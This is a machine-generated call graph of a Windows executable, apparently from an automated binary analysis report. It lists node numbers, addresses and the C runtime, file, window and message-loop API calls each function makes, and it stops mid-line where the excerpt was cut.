416b04 __malloc_crt 45 API calls 86926->86929 86932 41824b __tsopen_nolock 86926->86932 86928 41822a 86952 418752 46 API calls 9 library calls 86928->86952 86931 418256 86929->86931 86934 41825d 86931->86934 86935 41826c 86931->86935 86932->86919 86933 418231 86953 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86933->86953 86954 417f77 46 API calls __getptd_noexit 86934->86954 86937 4182cb __lock 45 API calls 86935->86937 86939 418273 86937->86939 86941 4182a6 86939->86941 86942 41827b InitializeCriticalSectionAndSpinCount 86939->86942 86944 413748 _free 45 API calls 86941->86944 86943 41828b 86942->86943 86949 418297 86942->86949 86945 413748 _free 45 API calls 86943->86945 86944->86949 86947 418291 86945->86947 86955 417f77 46 API calls __getptd_noexit 86947->86955 86956 4182c2 LeaveCriticalSection _doexit 86949->86956 86951->86928 86952->86933 86954->86932 86955->86949 86956->86932 86957->86867 86958->86869 87141 40e6e0 86959->87141 86963 401f41 GetModuleFileNameW 87159 410100 86963->87159 86965 401f5c 87171 410960 86965->87171 86968 401b10 52 API calls 86969 401f81 86968->86969 87174 401980 86969->87174 86971 401f8e 86972 408f40 VariantClear 86971->86972 86973 401f9d 86972->86973 86974 401b10 52 API calls 86973->86974 86975 401fb4 86974->86975 86976 401980 53 API calls 86975->86976 86977 401fc3 86976->86977 86978 401b10 52 API calls 86977->86978 86979 401fd2 86978->86979 87182 40c2c0 86979->87182 86981 401fe1 86982 40bc70 52 API calls 86981->86982 86983 401ff3 86982->86983 87200 401a10 86983->87200 86985 401ffe 87207 4114ab 86985->87207 86988 428b05 86990 401a10 52 API calls 86988->86990 86989 402017 86991 4114ab __wcsicoll 58 API calls 86989->86991 86992 428b18 86990->86992 86993 402022 86991->86993 86995 401a10 52 API calls 86992->86995 86993->86992 86994 40202d 86993->86994 86996 4114ab __wcsicoll 58 API calls 86994->86996 86997 428b33 86995->86997 86998 402038 86996->86998 87000 428b3b GetModuleFileNameW 86997->87000 86999 402043 86998->86999 86998->87000 87001 4114ab __wcsicoll 58 API calls 86999->87001 87002 401a10 52 API calls 87000->87002 87003 40204e 87001->87003 87004 428b6c 87002->87004 87005 402092 87003->87005 87009 401a10 52 API calls 87003->87009 87014 428b90 _wcscpy 87003->87014 87006 40e0a0 52 API calls 87004->87006 87008 4020a3 87005->87008 87005->87014 87007 428b7a 87006->87007 87010 401a10 52 API calls 87007->87010 87011 428bc6 87008->87011 87215 40e830 53 API calls 87008->87215 87012 402073 _wcscpy 87009->87012 87013 428b88 87010->87013 87020 401a10 52 API calls 87012->87020 87013->87014 87016 401a10 52 API calls 87014->87016 87024 4020d0 87016->87024 87017 4020bb 87216 40cf00 53 API calls 87017->87216 87019 4020c6 87021 408f40 VariantClear 87019->87021 87020->87005 87021->87024 87022 402110 87026 408f40 VariantClear 87022->87026 87024->87022 87027 401a10 52 API calls 87024->87027 87217 40cf00 53 API calls 87024->87217 87218 40e6a0 53 API calls 87024->87218 87028 402120 moneypunct 87026->87028 87027->87024 87028->86873 87030 40f53c 87029->87030 87032 4295c9 _memcpy_s 87029->87032 87897 410120 87030->87897 87034 4295d9 GetOpenFileNameW 87032->87034 87033 40f545 87901 4102b0 SHGetMalloc 87033->87901 87034->87030 87036 40d5f5 87034->87036 87036->86881 87036->86883 87037 40f54c 87906 410190 GetFullPathNameW 87037->87906 87039 40f559 87917 40f570 87039->87917 87979 402400 87041->87979 87043 40146f 87046 428c29 _wcscat 87043->87046 87988 401500 87043->87988 87045 40147c 87045->87046 87996 40d440 87045->87996 87048 401489 87048->87046 87049 401491 GetFullPathNameW 87048->87049 87050 402160 52 API calls 87049->87050 87051 4014bb 87050->87051 87052 402160 52 API calls 87051->87052 87053 4014c8 87052->87053 87053->87046 87054 402160 52 API calls 87053->87054 87055 4014ee 87054->87055 87055->86883 87057 428361 87056->87057 87058 4103fc LoadImageW RegisterClassExW 87056->87058 88016 44395e EnumResourceNamesW LoadImageW 87057->88016 88015 410490 7 API calls 87058->88015 87061 40d651 87063 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 87061->87063 87062 428368 87063->86895 87065 409202 87064->87065 87066 42d7ad 87064->87066 87124 409216 moneypunct 87065->87124 88288 410940 330 API calls 87065->88288 88291 45e737 90 API calls 3 library calls 87066->88291 87069 409386 87070 40939c 87069->87070 88289 40f190 10 API calls 87069->88289 87070->86897 87130 401000 Shell_NotifyIconW _memcpy_s 87070->87130 87072 4095b2 87072->87070 87074 4095bf 87072->87074 87073 409253 PeekMessageW 87073->87124 88290 401a50 330 API calls 87074->88290 87076 42d8cd Sleep 87076->87124 87077 4095c6 LockWindowUpdate DestroyWindow GetMessageW 87077->87070 87080 4095f9 87077->87080 87079 42e13b 88309 40d410 VariantClear 87079->88309 87083 42e158 TranslateMessage DispatchMessageW GetMessageW 87080->87083 87083->87083 87085 42e188 87083->87085 87084 409567 PeekMessageW 87084->87124 87085->87070 87088 44c29d 52 API calls 87129 4094e0 87088->87129 87089 46f3c1 107 API calls 87089->87124 87090 40e0a0 52 API calls 87090->87124 87091 46fdbf 108 API calls 87091->87129 87092 409551 TranslateMessage DispatchMessageW 87092->87084 87094 42dcd2 WaitForSingleObject 87097 42dcf0 GetExitCodeProcess CloseHandle 87094->87097 87094->87124 87095 42dd3d Sleep 87095->87129 87096 47d33e 308 API calls 87096->87124 88298 40d410 VariantClear 87097->88298 87101 4094cf Sleep 87101->87129 87102 42d94d timeGetTime 88294 465124 53 API calls 87102->88294 87104 40d410 VariantClear 87104->87124 87105 408f40 VariantClear 87105->87129 87108 40c620 timeGetTime 87108->87129 87109 465124 53 API calls 87109->87129 87111 42dd89 CloseHandle 87111->87129 87113 42de19 GetExitCodeProcess CloseHandle 87113->87129 87114 401b10 52 API calls 87114->87129 87117 42de88 Sleep 87117->87124 87120 401980 53 API calls 87120->87129 87121 45e737 90 API calls 87121->87124 87124->87069 87124->87073 87124->87076 87124->87079 87124->87084 87124->87089 87124->87090 87124->87092 87124->87094 87124->87095 87124->87096 87124->87101 87124->87102 87124->87104 87124->87121 87125 42e0cc VariantClear 87124->87125 87126 408f40 VariantClear 87124->87126 87124->87129 88017 4091b0 87124->88017 88075 40afa0 87124->88075 88101 408fc0 87124->88101 88136 408cc0 87124->88136 88150 40d150 87124->88150 88155 40d170 87124->88155 88161 4096a0 87124->88161 88292 465124 53 API calls 87124->88292 88293 40c620 timeGetTime 87124->88293 88308 40e270 VariantClear moneypunct 87124->88308 87125->87124 87126->87124 87129->87088 87129->87091 87129->87105 87129->87108 87129->87109 87129->87111 87129->87113 87129->87114 87129->87117 87129->87120 87129->87124 88295 45178a 54 API calls 87129->88295 88296 47d33e 330 API calls 87129->88296 88297 453bc6 54 API calls 87129->88297 88299 40d410 VariantClear 87129->88299 88300 443d19 67 API calls _wcslen 87129->88300 88301 4574b4 VariantClear 87129->88301 88302 403cd0 87129->88302 88306 4731e1 VariantClear 87129->88306 88307 4331a2 6 API calls 87129->88307 87130->86897 87131->86883 87132->86889 87134 401b16 _wcslen 87133->87134 87135 4115d7 52 API calls 87134->87135 87138 401b63 87134->87138 87136 401b4b _memmove 87135->87136 87137 4115d7 52 API calls 87136->87137 87137->87138 87139 40d200 52 API calls 2 library calls 87138->87139 87139->86905 87140->86908 87142 40bc70 52 API calls 87141->87142 87143 401f31 87142->87143 87144 402560 87143->87144 87145 40256d __write_nolock 87144->87145 87146 402160 52 API calls 87145->87146 87148 402593 87146->87148 87158 4025bd 87148->87158 87219 401c90 87148->87219 87149 4026f0 52 API calls 87149->87158 87150 4026a7 87151 401b10 52 API calls 87150->87151 87157 4026db 87150->87157 87153 4026d1 87151->87153 87152 401b10 52 API calls 87152->87158 87223 40d7c0 52 API calls 2 library calls 87153->87223 87154 401c90 52 API calls 87154->87158 87157->86963 87158->87149 87158->87150 87158->87152 87158->87154 87222 40d7c0 52 API calls 2 library calls 87158->87222 87224 40f760 87159->87224 87162 410118 87162->86965 87164 42805d 87165 42806a 87164->87165 87280 431e58 87164->87280 87167 413748 _free 46 API calls 87165->87167 87168 428078 87167->87168 87169 431e58 82 API calls 87168->87169 87170 428084 87169->87170 87170->86965 87172 4115d7 52 API calls 87171->87172 87173 401f74 87172->87173 87173->86968 87175 4019a3 87174->87175 87176 401985 87174->87176 87175->87176 87177 4019b8 87175->87177 87178 40199f 87176->87178 87885 403e10 53 API calls 87176->87885 87886 403e10 53 API calls 87177->87886 87178->86971 87181 4019c4 87181->86971 87183 40c2c7 87182->87183 87184 40c30e 87182->87184 87187 40c2d3 87183->87187 87188 426c79 87183->87188 87185 40c315 87184->87185 87186 426c2b 87184->87186 87189 40c321 87185->87189 87190 426c5a 87185->87190 87192 426c4b 87186->87192 87193 426c2e 87186->87193 87887 403ea0 52 API calls __cinit 87187->87887 87892 4534e3 52 API calls 87188->87892 87888 403ea0 52 API calls __cinit 87189->87888 87891 4534e3 52 API calls 87190->87891 87890 4534e3 52 API calls 87192->87890 87199 40c2de 87193->87199 87889 4534e3 52 API calls 87193->87889 87199->86981 87199->87199 87201 401a30 87200->87201 87202 401a17 87200->87202 87204 402160 52 API calls 87201->87204 87203 401a2d 87202->87203 87893 403c30 52 API calls _memmove 87202->87893 87203->86985 87206 401a3d 87204->87206 87206->86985 87208 411523 87207->87208 87209 4114ba 87207->87209 87896 4113a8 58 API calls 3 library calls 87208->87896 87214 40200c 87209->87214 87894 417f77 46 API calls __getptd_noexit 87209->87894 87212 4114c6 87895 417f25 10 API calls __wsplitpath_helper 87212->87895 87214->86988 87214->86989 87215->87017 87216->87019 87217->87024 87218->87024 87220 4026f0 52 API calls 87219->87220 87221 401c97 87220->87221 87221->87148 87222->87158 87223->87157 87284 40f6f0 87224->87284 87226 40f77b _strcat moneypunct 87292 40f850 87226->87292 87231 427c2a 87321 414d04 87231->87321 87233 40f7fc 87233->87231 87234 40f804 87233->87234 87308 414a46 87234->87308 87239 40f80e 87239->87162 87243 4528bd 87239->87243 87240 427c59 87327 414fe2 87240->87327 87242 427c79 87244 4150d1 _fseek 81 API calls 87243->87244 87245 452930 87244->87245 87827 452719 87245->87827 87248 452948 87248->87164 87249 414d04 __fread_nolock 61 API calls 87250 452966 87249->87250 87251 414d04 __fread_nolock 61 API calls 87250->87251 87252 452976 87251->87252 87253 414d04 __fread_nolock 61 API calls 87252->87253 87254 45298f 87253->87254 87255 414d04 __fread_nolock 61 API calls 87254->87255 87256 4529aa 87255->87256 87257 4150d1 _fseek 81 API calls 87256->87257 87258 4529c4 87257->87258 87259 4135bb _malloc 46 API calls 87258->87259 87260 4529cf 87259->87260 87261 4135bb _malloc 46 API calls 87260->87261 87262 4529db 87261->87262 87263 414d04 __fread_nolock 61 API calls 87262->87263 87264 4529ec 87263->87264 87265 44afef GetSystemTimeAsFileTime 87264->87265 87266 452a00 87265->87266 87267 452a36 87266->87267 87268 452a13 87266->87268 87270 452aa5 87267->87270 87271 452a3c 87267->87271 87269 413748 _free 46 API calls 87268->87269 87273 452a1c 87269->87273 87272 413748 _free 46 API calls 87270->87272 87833 44b1a9 87271->87833 87279 452aa3 87272->87279 87275 413748 _free 46 API calls 87273->87275 87277 452a25 87275->87277 87276 452a9d 87278 413748 _free 46 API calls 87276->87278 87277->87164 87278->87279 87279->87164 87281 431e64 87280->87281 87283 431e6a 87280->87283 87282 414a46 __fcloseall 82 API calls 87281->87282 87282->87283 87283->87165 87285 425de2 87284->87285 87286 40f6fc _wcslen 87284->87286 87285->87226 87287 40f710 WideCharToMultiByte 87286->87287 87288 40f756 87287->87288 87289 40f728 87287->87289 87288->87226 87290 4115d7 52 API calls 87289->87290 87291 40f735 WideCharToMultiByte 87290->87291 87291->87226 87294 40f85d _memcpy_s _strlen 87292->87294 87295 40f7ab 87294->87295 87340 414db8 87294->87340 87296 4149c2 87295->87296 87355 414904 87296->87355 87298 40f7e9 87298->87231 87299 40f5c0 87298->87299 87304 40f5cd _strcat __write_nolock _memmove 87299->87304 87300 414d04 __fread_nolock 61 API calls 87300->87304 87302 425d11 87303 4150d1 _fseek 81 API calls 87302->87303 87305 425d33 87303->87305 87304->87300 87304->87302 87307 40f691 __tzset_nolock 87304->87307 87443 4150d1 87304->87443 87306 414d04 __fread_nolock 61 API calls 87305->87306 87306->87307 87307->87233 87309 414a52 __tsopen_nolock 87308->87309 87310 414a64 87309->87310 87311 414a79 87309->87311 87583 417f77 46 API calls __getptd_noexit 87310->87583 87313 415471 __lock_file 47 API calls 87311->87313 87317 414a74 __tsopen_nolock 87311->87317 87315 414a92 87313->87315 87314 414a69 87584 417f25 10 API calls __wsplitpath_helper 87314->87584 87567 4149d9 87315->87567 87317->87239 87652 414c76 87321->87652 87323 414d1c 87324 44afef 87323->87324 87820 442c5a 87324->87820 87326 44b00d 87326->87240 87328 414fee __tsopen_nolock 87327->87328 87329 414ffa 87328->87329 87330 41500f 87328->87330 87824 417f77 46 API calls __getptd_noexit 87329->87824 87332 415471 __lock_file 47 API calls 87330->87332 87334 415017 87332->87334 87333 414fff 87825 417f25 10 API calls __wsplitpath_helper 87333->87825 87336 414e4e __ftell_nolock 51 API calls 87334->87336 87338 415024 87336->87338 87337 41500a __tsopen_nolock 87337->87242 87826 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87338->87826 87341 414dd6 87340->87341 87342 414deb 87340->87342 87351 417f77 46 API calls __getptd_noexit 87341->87351 87342->87341 87344 414df2 87342->87344 87353 41b91b 79 API calls 12 library calls 87344->87353 87345 414ddb 87352 417f25 10 API calls __wsplitpath_helper 87345->87352 87348 414e18 87349 414de6 87348->87349 87354 418f98 77 API calls 6 library calls 87348->87354 87349->87294 87351->87345 87352->87349 87353->87348 87354->87349 87357 414910 __tsopen_nolock 87355->87357 87356 414923 87411 417f77 46 API calls __getptd_noexit 87356->87411 87357->87356 87360 414951 87357->87360 87359 414928 87412 417f25 10 API calls __wsplitpath_helper 87359->87412 87374 41d4d1 87360->87374 87363 414956 87364 41496a 87363->87364 87365 41495d 87363->87365 87367 414992 87364->87367 87368 414972 87364->87368 87413 417f77 46 API calls __getptd_noexit 87365->87413 87391 41d218 87367->87391 87414 417f77 46 API calls __getptd_noexit 87368->87414 87370 414933 __tsopen_nolock @_EH4_CallFilterFunc@8 87370->87298 87375 41d4dd __tsopen_nolock 87374->87375 87376 4182cb __lock 46 API calls 87375->87376 87389 41d4eb 87376->87389 87377 41d560 87416 41d5fb 87377->87416 87378 41d567 87380 416b04 __malloc_crt 46 API calls 87378->87380 87381 41d56e 87380->87381 87381->87377 87383 41d57c InitializeCriticalSectionAndSpinCount 87381->87383 87382 41d5f0 __tsopen_nolock 87382->87363 87384 41d59c 87383->87384 87385 41d5af EnterCriticalSection 87383->87385 87388 413748 _free 46 API calls 87384->87388 87385->87377 87386 418209 __mtinitlocknum 46 API calls 87386->87389 87388->87377 87389->87377 87389->87378 87389->87386 87419 4154b2 47 API calls __lock 87389->87419 87420 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87389->87420 87392 41d23a 87391->87392 87393 41d255 87392->87393 87403 41d26c __wopenfile 87392->87403 87425 417f77 46 API calls __getptd_noexit 87393->87425 87395 41d25a 87426 417f25 10 API calls __wsplitpath_helper 87395->87426 87396 41d47a 87430 417f77 46 API calls __getptd_noexit 87396->87430 87397 41d48c 87422 422bf9 87397->87422 87401 41d47f 87431 417f25 10 API calls __wsplitpath_helper 87401->87431 87402 41499d 87415 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87402->87415 87403->87396 87410 41d421 87403->87410 87427 41341f 58 API calls 2 library calls 87403->87427 87406 41d41a 87406->87410 87428 41341f 58 API calls 2 library calls 87406->87428 87408 41d439 87408->87410 87429 41341f 58 API calls 2 library calls 87408->87429 87410->87396 87410->87397 87411->87359 87412->87370 87413->87370 87414->87370 87415->87370 87421 4181f2 LeaveCriticalSection 87416->87421 87418 41d602 87418->87382 87419->87389 87420->87389 87421->87418 87432 422b35 87422->87432 87424 422c14 87424->87402 87425->87395 87426->87402 87427->87406 87428->87408 87429->87410 87430->87401 87431->87402 87435 422b41 __tsopen_nolock 87432->87435 87433 422b54 87434 417f77 __wsplitpath_helper 46 API calls 87433->87434 87437 422b59 87434->87437 87435->87433 87436 422b8a 87435->87436 87438 422400 __tsopen_nolock 109 API calls 87436->87438 87439 417f25 __wsplitpath_helper 10 API calls 87437->87439 87440 422ba4 87438->87440 87442 422b63 __tsopen_nolock 87439->87442 87441 422bcb __wsopen_helper LeaveCriticalSection 87440->87441 87441->87442 87442->87424 87444 4150dd __tsopen_nolock 87443->87444 87445 4150e9 87444->87445 87447 41510f 87444->87447 87474 417f77 46 API calls __getptd_noexit 87445->87474 87456 415471 87447->87456 87448 4150ee 87475 417f25 10 API calls __wsplitpath_helper 87448->87475 87455 4150f9 __tsopen_nolock 87455->87304 87457 415483 87456->87457 87458 4154a5 EnterCriticalSection 87456->87458 87457->87458 87459 41548b 87457->87459 87460 415117 87458->87460 87461 4182cb __lock 46 API calls 87459->87461 87462 415047 87460->87462 87461->87460 87463 415067 87462->87463 87464 415057 87462->87464 87469 415079 87463->87469 87477 414e4e 87463->87477 87532 417f77 46 API calls __getptd_noexit 87464->87532 87468 41505c 87476 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87468->87476 87494 41443c 87469->87494 87472 4150b9 87507 41e1f4 87472->87507 87474->87448 87475->87455 87476->87455 87478 414e61 87477->87478 87479 414e79 87477->87479 87533 417f77 46 API calls __getptd_noexit 87478->87533 87480 414139 __fflush_nolock 46 API calls 87479->87480 87482 414e80 87480->87482 87485 41e1f4 __write 51 API calls 87482->87485 87483 414e66 87534 417f25 10 API calls __wsplitpath_helper 87483->87534 87486 414e97 87485->87486 87487 414f09 87486->87487 87489 414ec9 87486->87489 87493 414e71 87486->87493 87535 417f77 46 API calls __getptd_noexit 87487->87535 87490 41e1f4 __write 51 API calls 87489->87490 87489->87493 87491 414f64 87490->87491 87492 41e1f4 __write 51 API calls 87491->87492 87491->87493 87492->87493 87493->87469 87495 414455 87494->87495 87496 414477 87494->87496 87495->87496 87497 414139 __fflush_nolock 46 API calls 87495->87497 87500 414139 87496->87500 87498 414470 87497->87498 87536 41b7b2 77 API calls 6 library calls 87498->87536 87501 414145 87500->87501 87502 41415a 87500->87502 87537 417f77 46 API calls __getptd_noexit 87501->87537 87502->87472 87504 41414a 87538 417f25 10 API calls __wsplitpath_helper 87504->87538 87506 414155 87506->87472 87508 41e200 __tsopen_nolock 87507->87508 87509 41e208 87508->87509 87511 41e223 87508->87511 87559 417f8a 46 API calls __getptd_noexit 87509->87559 87512 41e22f 87511->87512 87515 41e269 87511->87515 87561 417f8a 46 API calls __getptd_noexit 87512->87561 87513 41e20d 87560 417f77 46 API calls __getptd_noexit 87513->87560 87539 41ae56 87515->87539 87517 41e234 87562 417f77 46 API calls __getptd_noexit 87517->87562 87520 41e23c 87563 417f25 10 API calls __wsplitpath_helper 87520->87563 87521 41e26f 87523 41e291 87521->87523 87524 41e27d 87521->87524 87564 417f77 46 API calls __getptd_noexit 87523->87564 87549 41e17f 87524->87549 87525 41e215 __tsopen_nolock 87525->87468 87528 41e289 87566 41e2c0 LeaveCriticalSection __unlock_fhandle 87528->87566 87529 41e296 87565 417f8a 46 API calls __getptd_noexit 87529->87565 87532->87468 87533->87483 87534->87493 87535->87493 87536->87496 87537->87504 87538->87506 87540 41ae62 __tsopen_nolock 87539->87540 87541 41aebc 87540->87541 87542 4182cb __lock 46 API calls 87540->87542 87543 41aec1 EnterCriticalSection 87541->87543 87544 41aede __tsopen_nolock 87541->87544 87545 41ae8e 87542->87545 87543->87544 87544->87521 87546 41aeaa 87545->87546 87547 41ae97 InitializeCriticalSectionAndSpinCount 87545->87547 87548 41aeec ___lock_fhandle LeaveCriticalSection 87546->87548 87547->87546 87548->87541 87550 41aded __lseeki64_nolock 46 API calls 87549->87550 87551 41e18e 87550->87551 87552 41e1a4 SetFilePointer 87551->87552 87553 41e194 87551->87553 87554 41e1c3 87552->87554 87555 41e1bb GetLastError 87552->87555 87556 417f77 __wsplitpath_helper 46 API calls 87553->87556 87557 41e199 87554->87557 87558 417f9d __dosmaperr 46 API calls 87554->87558 87555->87554 87556->87557 87557->87528 87558->87557 87559->87513 87560->87525 87561->87517 87562->87520 87563->87525 87564->87529 87565->87528 87566->87525 87568 4149ea 87567->87568 87569 4149fe 87567->87569 87613 417f77 46 API calls __getptd_noexit 87568->87613 87571 4149fa 87569->87571 87573 41443c __flush 77 API calls 87569->87573 87585 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87571->87585 87572 4149ef 87614 417f25 10 API calls __wsplitpath_helper 87572->87614 87575 414a0a 87573->87575 87586 41d8c2 87575->87586 87578 414139 __fflush_nolock 46 API calls 87579 414a18 87578->87579 87590 41d7fe 87579->87590 87581 414a1e 87581->87571 87582 413748 _free 46 API calls 87581->87582 87582->87571 87583->87314 87584->87317 87585->87317 87587 414a12 87586->87587 87588 41d8d2 87586->87588 87587->87578 87588->87587 87589 413748 _free 46 API calls 87588->87589 87589->87587 87591 41d80a __tsopen_nolock 87590->87591 87592 41d812 87591->87592 87596 41d82d 87591->87596 87630 417f8a 46 API calls __getptd_noexit 87592->87630 87594 41d839 87632 417f8a 46 API calls __getptd_noexit 87594->87632 87595 41d817 87631 417f77 46 API calls __getptd_noexit 87595->87631 87596->87594 87598 41d873 87596->87598 87601 41ae56 ___lock_fhandle 48 API calls 87598->87601 87600 41d83e 87633 417f77 46 API calls __getptd_noexit 87600->87633 87603 41d879 87601->87603 87606 41d893 87603->87606 87607 41d887 87603->87607 87604 41d846 87634 417f25 10 API calls __wsplitpath_helper 87604->87634 87635 417f77 46 API calls __getptd_noexit 87606->87635 87615 41d762 87607->87615 87608 41d81f __tsopen_nolock 87608->87581 87611 41d88d 87636 41d8ba LeaveCriticalSection __unlock_fhandle 87611->87636 87613->87572 87614->87571 87637 41aded 87615->87637 87617 41d772 87618 41d7c8 87617->87618 87619 41d7a6 87617->87619 87621 41aded __lseeki64_nolock 46 API calls 87617->87621 87650 41ad67 47 API calls 2 library calls 87618->87650 87619->87618 87622 41aded __lseeki64_nolock 46 API calls 87619->87622 87624 41d79d 87621->87624 87625 41d7b2 CloseHandle 87622->87625 87623 41d7d0 87626 41d7f2 87623->87626 87651 417f9d 46 API calls 3 library calls 87623->87651 87628 41aded __lseeki64_nolock 46 API calls 87624->87628 87625->87618 87629 41d7be GetLastError 87625->87629 87626->87611 87628->87619 87629->87618 87630->87595 87631->87608 87632->87600 87633->87604 87634->87608 87635->87611 87636->87608 87638 41ae12 87637->87638 87639 41adfa 87637->87639 87642 417f8a __read_nolock 46 API calls 87638->87642 87645 41ae51 87638->87645 87640 417f8a __read_nolock 46 API calls 87639->87640 87641 41adff 87640->87641 87643 417f77 __wsplitpath_helper 46 API calls 87641->87643 87644 41ae23 87642->87644 87646 41ae07 87643->87646 87647 417f77 __wsplitpath_helper 46 API calls 87644->87647 87645->87617 87646->87617 87648 41ae2b 87647->87648 87649 417f25 __wsplitpath_helper 10 API calls 87648->87649 87649->87646 87650->87623 87651->87626 87653 414c82 __tsopen_nolock 87652->87653 87654 414cc3 87653->87654 87655 414cbb __tsopen_nolock 87653->87655 87660 414c96 _memcpy_s 87653->87660 87656 415471 __lock_file 47 API calls 87654->87656 87655->87323 87657 414ccb 87656->87657 87665 414aba 87657->87665 87679 417f77 46 API calls __getptd_noexit 87660->87679 87661 414cb0 87680 417f25 10 API calls __wsplitpath_helper 87661->87680 87668 414ad8 _memcpy_s 87665->87668 87671 414af2 87665->87671 87666 414ae2 87732 417f77 46 API calls __getptd_noexit 87666->87732 87668->87666 87668->87671 87675 414b2d 87668->87675 87681 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87671->87681 87672 414c38 _memcpy_s 87735 417f77 46 API calls __getptd_noexit 87672->87735 87673 414139 __fflush_nolock 46 API calls 87673->87675 87675->87671 87675->87672 87675->87673 87682 41dfcc 87675->87682 87712 41d8f3 87675->87712 87734 41e0c2 46 API calls 3 library calls 87675->87734 87678 414ae7 87733 417f25 10 API calls __wsplitpath_helper 87678->87733 87679->87661 87680->87655 87681->87655 87683 41dfd8 __tsopen_nolock 87682->87683 87684 41dfe0 87683->87684 87685 41dffb 87683->87685 87805 417f8a 46 API calls __getptd_noexit 87684->87805 87686 41e007 87685->87686 87691 41e041 87685->87691 87807 417f8a 46 API calls __getptd_noexit 87686->87807 87689 41dfe5 87806 417f77 46 API calls __getptd_noexit 87689->87806 87690 41e00c 87808 417f77 46 API calls __getptd_noexit 87690->87808 87694 41e063 87691->87694 87695 41e04e 87691->87695 87696 41ae56 ___lock_fhandle 48 API calls 87694->87696 87810 417f8a 46 API calls __getptd_noexit 87695->87810 87700 41e069 87696->87700 87697 41e014 87809 417f25 10 API calls __wsplitpath_helper 87697->87809 87699 41e053 87811 417f77 46 API calls __getptd_noexit 87699->87811 87703 41e077 87700->87703 87704 41e08b 87700->87704 87702 41dfed __tsopen_nolock 87702->87675 87736 41da15 87703->87736 87812 417f77 46 API calls __getptd_noexit 87704->87812 87708 41e083 87814 41e0ba LeaveCriticalSection __unlock_fhandle 87708->87814 87709 41e090 87813 417f8a 46 API calls __getptd_noexit 87709->87813 87713 41d900 87712->87713 87717 41d915 87712->87717 87818 417f77 46 API calls __getptd_noexit 87713->87818 87715 41d905 87819 417f25 10 API calls __wsplitpath_helper 87715->87819 87718 41d94a 87717->87718 87723 41d910 87717->87723 87815 420603 87717->87815 87720 414139 __fflush_nolock 46 API calls 87718->87720 87721 41d95e 87720->87721 87722 41dfcc __read 59 API calls 87721->87722 87724 41d965 87722->87724 87723->87675 87724->87723 87725 414139 __fflush_nolock 46 API calls 87724->87725 87726 41d988 87725->87726 87726->87723 87727 414139 __fflush_nolock 46 API calls 87726->87727 87728 41d994 87727->87728 87728->87723 87729 414139 __fflush_nolock 46 API calls 87728->87729 87730 41d9a1 87729->87730 87731 414139 __fflush_nolock 46 API calls 87730->87731 87731->87723 87732->87678 87733->87671 87734->87675 87735->87678 87737 41da31 87736->87737 87738 41da4c 87736->87738 87739 417f8a __read_nolock 46 API calls 87737->87739 87740 41da5b 87738->87740 87742 41da7a 87738->87742 87741 41da36 87739->87741 87743 417f8a __read_nolock 46 API calls 87740->87743 87745 417f77 __wsplitpath_helper 46 API calls 87741->87745 87744 41da98 87742->87744 87758 41daac 87742->87758 87746 41da60 87743->87746 87747 417f8a __read_nolock 46 API calls 87744->87747 87759 41da3e 87745->87759 87749 417f77 __wsplitpath_helper 46 API calls 87746->87749 87751 41da9d 87747->87751 87748 41db02 87750 417f8a __read_nolock 46 API calls 87748->87750 87752 41da67 87749->87752 87753 41db07 87750->87753 87754 417f77 __wsplitpath_helper 46 API calls 87751->87754 87755 417f25 __wsplitpath_helper 10 API calls 87752->87755 87756 417f77 __wsplitpath_helper 46 API calls 87753->87756 87757 41daa4 87754->87757 87755->87759 87756->87757 87761 417f25 __wsplitpath_helper 10 API calls 87757->87761 87758->87748 87758->87759 87760 41dae1 87758->87760 87762 41db1b 87758->87762 87759->87708 87760->87748 87767 41daec ReadFile 87760->87767 87761->87759 87764 416b04 __malloc_crt 46 API calls 87762->87764 87768 41db31 87764->87768 87765 41dc17 87766 41df8f GetLastError 87765->87766 87773 41dc2b 87765->87773 87769 41de16 87766->87769 87770 41df9c 87766->87770 87767->87765 87767->87766 87771 41db59 87768->87771 87772 41db3b 87768->87772 87779 417f9d __dosmaperr 46 API calls 87769->87779 87785 41dd9b 87769->87785 87775 417f77 __wsplitpath_helper 46 API calls 87770->87775 87774 420494 __lseeki64_nolock 48 API calls 87771->87774 87776 417f77 __wsplitpath_helper 46 API calls 87772->87776 87784 41de5b 87773->87784 87773->87785 87788 41dc47 87773->87788 87777 41db67 87774->87777 87778 41dfa1 87775->87778 87780 41db40 87776->87780 87777->87767 87781 417f8a __read_nolock 46 API calls 87778->87781 87779->87785 87782 417f8a __read_nolock 46 API calls 87780->87782 87781->87785 87782->87759 87783 413748 _free 46 API calls 87783->87759 87784->87785 87786 41ded0 ReadFile 87784->87786 87785->87759 87785->87783 87792 41deef GetLastError 87786->87792 87797 41def9 87786->87797 87787 41dd28 87787->87785 87795 41dda3 87787->87795 87796 41dd96 87787->87796 87802 41dd60 87787->87802 87788->87787 87789 41dcab ReadFile 87788->87789 87790 41dcd3 87789->87790 87791 41dcc9 GetLastError 87789->87791 87790->87788 87800 420494 __lseeki64_nolock 48 API calls 87790->87800 87791->87788 87791->87790 87792->87784 87792->87797 87793 41ddec MultiByteToWideChar 87793->87785 87794 41de10 GetLastError 87793->87794 87794->87769 87799 41ddda 87795->87799 87795->87802 87798 417f77 __wsplitpath_helper 46 API calls 87796->87798 87797->87784 87801 420494 __lseeki64_nolock 48 API calls 87797->87801 87798->87785 87803 420494 __lseeki64_nolock 48 API calls 87799->87803 87800->87790 87801->87797 87802->87793 87804 41dde9 87803->87804 87804->87793 87805->87689 87806->87702 87807->87690 87808->87697 87809->87702 87810->87699 87811->87697 87812->87709 87813->87708 87814->87702 87816 416b04 __malloc_crt 46 API calls 87815->87816 87817 420618 87816->87817 87817->87718 87818->87715 87819->87723 87823 4148b3 GetSystemTimeAsFileTime __aulldiv 87820->87823 87822 442c6b 87822->87326 87823->87822 87824->87333 87825->87337 87826->87337 87832 45272f __tzset_nolock _wcscpy 87827->87832 87828 44afef GetSystemTimeAsFileTime 87828->87832 87829 4528a4 87829->87248 87829->87249 87830 414d04 61 API calls __fread_nolock 87830->87832 87831 4150d1 81 API calls _fseek 87831->87832 87832->87828 87832->87829 87832->87830 87832->87831 87834 44b1bc 87833->87834 87835 44b1ca 87833->87835 87836 4149c2 116 API calls 87834->87836 87837 44b1e1 87835->87837 87838 4149c2 